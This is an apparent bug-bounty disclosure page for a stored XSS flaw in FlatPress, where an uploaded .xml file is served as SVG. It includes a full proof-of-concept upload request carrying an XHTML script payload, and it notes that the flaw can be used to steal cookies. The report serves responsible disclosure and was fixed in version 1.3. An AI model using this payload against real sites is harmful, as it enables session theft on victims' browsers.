Stored XSS via XML File in flatpressblog/flatpress

Valid

Reported on

Dec 24th 2022


Description

When user upload a file with .xml extension and direct access this file, the server response with Content-type: image/svg+xml lead to processing XML as HTML file

POC

POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 639
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMXzGcbIqZ5KtoAKf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u

------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="_wpnonce"

78d8e366e5
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="_wp_http_referer"

/flatpress-master/admin.php?p=uploader
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="upload[]"; filename="xss.xml"
Content-Type: image/svg+xml

<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.domain)</something:script>
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="upload"

Upload
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf--

Steps to take

  1. Log in and then access /admin.php?p=uploader&action=default
  2. Perform XML file upload, using malicious javascript to steal user cookies.

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the flatpressblog/flatpress team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back a year ago
flatpressblog/flatpress maintainer validated this vulnerability a year ago

Learned that Markdown may contain JS as well - thanks!

juylang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
flatpressblog/flatpress maintainer marked this as fixed in 1.3 with commit 3cc223 a year ago
The fix bounty has been dropped
Juy Lang
a year ago

Researcher


Can you help me, designate the vulnerability as a CVE !!

This vulnerability has now been published a year ago
to join this conversation